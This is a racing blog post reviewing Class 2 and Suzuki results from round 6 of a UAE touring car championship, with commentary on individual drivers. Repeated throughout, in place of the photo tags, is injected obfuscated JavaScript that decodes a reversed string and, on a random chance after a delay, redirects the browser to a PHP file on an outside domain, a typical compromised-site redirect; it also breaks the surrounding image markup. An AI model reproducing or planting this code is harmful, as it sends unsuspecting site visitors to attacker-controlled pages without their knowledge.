I’m a couple of days late with this one…many apologies!! Pt2 two of the Touring Car review brings you an insight into the super competitive Class 2 (2.0 N/A) and the nutters in the Suzuki’s.So rather than fudging my way through it, take the jump and enjoy!

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/UAETCC%20GT%202009/rd6/Touring%20Cars/UAETCCRd6Dubai300.jpg” width=”728″ />

It’s been hard to stop Umair all year long when he’s running in top form and indeed top form was the order of the day for the Lap57 cars as Umair romped to a double win again, albeit after being chased hard by Aslam Moola in the Green Monster in race 1 and by Lap57 teammate Omran Al Owais in race 2.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/UAETCC%20GT%202009/rd6/Touring%20Cars/UAETCCRd6Dubai117.jpg” width=”728″ />

About the only disappointment we have here is that Umair didn’t do anything amusing along the way, like win while running on three wheels or something. But hats off – they guys just plain quick, the car’s well set up and running strong and therefore the gauntlet’s been thrown once again with another win that’s very well deserved.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/UAETCC%20GT%202009/rd6/Touring%20Cars/UAETCCRd6Dubai235.jpg” width=”728″ />

Omran’s turn to suffer a little mechanical drama with a DNF in race 1, which meant that he got to start at the back of the grid in race 2 and fight his way up the order, which he did most ably, ending up with a P2 after an insane charge past, well, pretty much evrybody until he was suddenly caught up with teammate Umair Khan.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/UAETCC%20GT%202009/rd6/Touring%20Cars/UAETCCRd6Dubai237.jpg” width=”728″ />

A slight battle between the two Lap57 teammates as they pushed one another hard while race 2 wound down provided some thrills, as well as two more trophies for the Lap57 collection. These guys are just seriously quick – on a whole other level than the rest of the Class 2 field. We can’t help wondering whether or when the rest of the field will catch up, versus the organizers having to slow these guys down somehow (we’d much prefer to see the rest of the class up their game of course).

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/UAETCC%20GT%202009/rd6/Touring%20Cars/UAETCCRd6Dubai142.jpg” width=”728″ />

Coming off a great performance in round 5, Spencer’s a2b Honda was again in top fighting form for NRD6, where he managed to clinch two third place podium spots against a killer field.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/UAETCC%20GT%202009/rd6/Touring%20Cars/UAETCCRd6Dubai211.jpg” width=”728″ />

It wasn’t exactly a cakewalk though – in addition to having to outrun very quick a2b teammate Jason O’Keefe, Spencer ended up in a battle royale against the TAM/House of Portier Clio of Mohammed Al Mutawaa in race 1, with the young Emirati driver trying every trick in the book to fend off a very determined Spencer.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/UAETCC%20GT%202009/rd6/Touring%20Cars/UAETCCRd6Dubai146.jpg” width=”728″ />

Ultimately it was Mista Van Der Paal who won the fight and grabbed the race 1 trophy, while teammate Jason chased him hard to the podium in Race 2 as both a2b drivers managed to slip away from an otherwise-engaged Mutawaa the Younger.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/UAETCC%20GT%202009/rd6/Touring%20Cars/UAETCCRd6Dubai215.jpg” width=”728″ />

His second place in Race 1 is enough to keep Aslam out of the Honorable Mention category and a fine performance it was. After a hiccup in round 5, Aslam was back in fighting form with the fastest qualifying time in Class 2 and looking to pull off another win.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/UAETCC%20GT%202009/rd6/Touring%20Cars/UAETCCRd6Dubai127.jpg” width=”728″ />

An on-form Umair Khan managed to put a stop to that one in spite of a great effort by Aslam, who nonetheless took his P2 trophy in style.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/UAETCC%20GT%202009/rd6/Touring%20Cars/UAETCCRd6Dubai14.jpg” width=”728″ />

In Race 2 calamity struck though, as Aslam’s car was involved in a freak multicar shunt which saw the Green Machine suffer a pretty bad knock to the front right suspension, making Aslam unable to even make his way back to the pits let alone start the race. Luckily the driver’s unharmed and rumour has it that the car’s repairable, so we hope to see it back for the next round at Yas…we hope!

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/UAETCC%20GT%202009/rd6/Touring%20Cars/UAETCCRd6Dubai159.jpg” width=”728″ />

Jason’s own a2b Honda has also been running very well this season, but with a much less agressive setup than many of his competitors it’s always a hard fight for the podium spots.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/UAETCC%20GT%202009/rd6/Touring%20Cars/UAETCCRd6Dubai210.jpg” width=”728″ />

Race 1 saw Jason engaged in a four way battle with Eissa Bin Hadher, Mohammed Al Mutawaa, Zlatko and Teammate Spencer Van Der Paal for P3, ending up in P6 behind Eissa and Al Mutawaa as they fought each other to the end, with Spencer having slipped by the pack and onto the podium. Race 2 saw Eissa retire and Al Mutawaa get caught up with Zlatko however, leaving the two a2b cars to get away relatively unmolested, with Jason ultimately grabbing P4.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/UAETCC%20GT%202009/rd6/Touring%20Cars/UAETCCRd6Dubai129.jpg” width=”728″ />

“On form” would be too gentle of a description of Zlatko on race day 6 so we’ll go with “war machine” to describe the Old Man’s level of intensity on the day. The Performance Racing Castrol Integra seems to have finally found its legs and Zlatko’s been in no mood to waste time that could be spent fighting his way up to the top of the pile.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/UAETCC%20GT%202009/rd6/Touring%20Cars/UAETCCRd6Dubai230.jpg” width=”728″ />

An epic battle between Zlatko, Eissa, Jason and Mohammed Al Mutawaa (and probably others) was the deal in race 1, with Zlatko running as high as 4th before one of his overly long appendages came into contact with the key fob in his car, thereby switching off the whole thing in the middle of the race! We don’t want to know what kind of words were running through Mr. Mulabegovic’s head at that partiular moment but no doubt it’d be in NSFW territory and then some. Ultimately, Zlatko recovered and caught up a pair of Clios by the time the flag fell on race 1.

Race 2 was all about Zlatko vs.TAM/House of Portier driver Mohammed Al Mutawaa, as the two very aggressive drivers engaged in an absolutely fierce, bumper to bumper and fender to fender battle for P5. After swapping positions, paint and car parts for much of the race it was Zlatko who came out on top in the end, by a hair. A fine showing, and about as close as it gets in terms of racing before you’re better off hitting the bumper car area at the fair.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/UAETCC%20GT%202009/rd6/Touring%20Cars/UAETCCRd6Dubai139.jpg” width=”728″ />

After grabbing a string of podiums at the beginning of the season, the young Emirati has found himself fighting tooth and nail for his life in every single race these days as the rest of the pack has continued to get meaner, stronger and faster all around him. Mutawaa the Younger’s not gotten slower by any stretch, as shown by a very strong 3rd place qualifying performance, but the days of easy trophies are over it seems. In race 1 Al Mutawaa was running in P3 early on before being caught by Spencer, Eissa, Zlatko and Jason, who pushed him very hard, with Spencer ultimately forcing his way past the hapless Emirati driver in spite of every attempt to defend his position.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/UAETCC%20GT%202009/rd6/Touring%20Cars/UAETCCRd6Dubai15.jpg” width=”728″ />

Race 2 saw Al Mutawaa engage Jason O’Keefe and Zlatko Mulabecovic in a furious race-long battle, with Jason slipping by early on and Zlatko and Al Mutawaa all over each other until the flag, where Zlatko finally made a move that Al Mutawaa couldn’t answer in time to take P5. We’d almost feel bad for Al Mutawaa in a way if he weren’t having so much fun out there.

Running a very sinister looking Performance Racing Monster Honda, Bin Ghannam put on his best performance to date on NRD6. A good start in race 1 unfortunately ended up in a DNF, but Race 2 saw Mohammed finally unleash a good amount of his car’s potential, fending off John Iossifidis’s Clio and chasing down Mohammed Al Mutawaa for P7. We’ve seen many a Class 2 car in development over the season so far and this one seems to be coming along nicely now – looking forward to Bin Ghannam becoming a regular force in the grid, and finishing order, any time now.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/UAETCC%20GT%202009/rd6/Touring%20Cars/UAETCCRd6Dubai158.jpg” width=”728″ />

Right in the thick of the battle again in Race 1, Performance Racing driver Eissa found himself once again mixing it up with O’Keefe, Vanderpal, Al Mutawaa and Mulabegovic at various times gunning for the P3 spot, ultimately ending up in a strong 5th place behind Al Mutawaa. Unfortunately DNF-itis struck in Race 2, with Eissa retiring prematurely as his car suddenly lost pace. Great to see Eissa being a force in the finishing order nowadays though, he’ll be right back in the hunt again next round we imagine.

John IOSSIFIDIS
$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/UAETCC%20GT%202009/rd6/Touring%20Cars/UAETCCRd6Dubai243.jpg” width=”728″ />
We have the feeling that the adrenaline levels have ratcheted up a good few notched for Mr. Iossifidis, who found himself battling with fellow Ozzie and fellow Clio driver Martin Baerschmidt in race 1, with only a few hairs separating the two cars as they passed the flag in the end. In race 2 Iossifidis found himself tracking down the melee for P3-through-P7 just behind all the crazy fellows. Looks like the familiarization time’s over then and Mr. Iossifidis is getting his race on!

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/UAETCC%20GT%202009/rd6/Touring%20Cars/UAETCCRd6Dubai133.jpg” width=”728″ />

Another Clio to fill out the grid is always welcome and Martin Baerschmidt, whose name we’ve seen before from time to time, was right up in it, battling with Clio-mate Iossifidis in Race 1 and being sandwiched by a bunch of Golfs in Race 2. We’re looking forward to more Iossifidis/Baerschmidt Clio vs. Clio battles as the two cars seem very well matched on track, but who knows what else will turn up and/or get in the way of these two!

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/UAETCC%20GT%202009/rd6/Touring%20Cars/UAETCCRd6Dubai212.jpg” width=”728″ />

Mixed luck for these fine chaps in NRD6 but Arif had a good run going in Race 1 in his Integra, while Jonny Forster always seems to run impressively high up the field among the quick guys befire somehow before lady luck always seems to pay a visit to his driveshafts.

Phil Anson had some DNX/DNF nastiness as well this time around, pretty out of character after running a very strong and reliable season to date. We’ll see you next time, boys!

In a class of his own (pretty much literally), Rupesh seems to be more interested in playing with the Class 2 boys than anything else, able to chase down the odd Golf, Clio or Honda that might blink for a minute, which is impressive given that Rupesh’s huge power defecit vs. the 2.0 litre cars. We’re starting to see Rupesh get into his race groove as well, starting to take a look up the inside of various cars in the corners, feel his way around the braking zones etc. while keeping things clean. It’s always fun being an underdog, so we enjoy seeing how far up the grid Rupesh can make his influence felt each time out.

Seems more and more folks are trying out the Suzukis these days. Race 1 saw a good battle between former TCC champ Costas Papantonis and Balazs Galotti once again for the win in Race 1, with Lebanon’s Yusif Bassil taking a well fought surprise win in Race 2 as Balasz and Alex Annivas retired early.
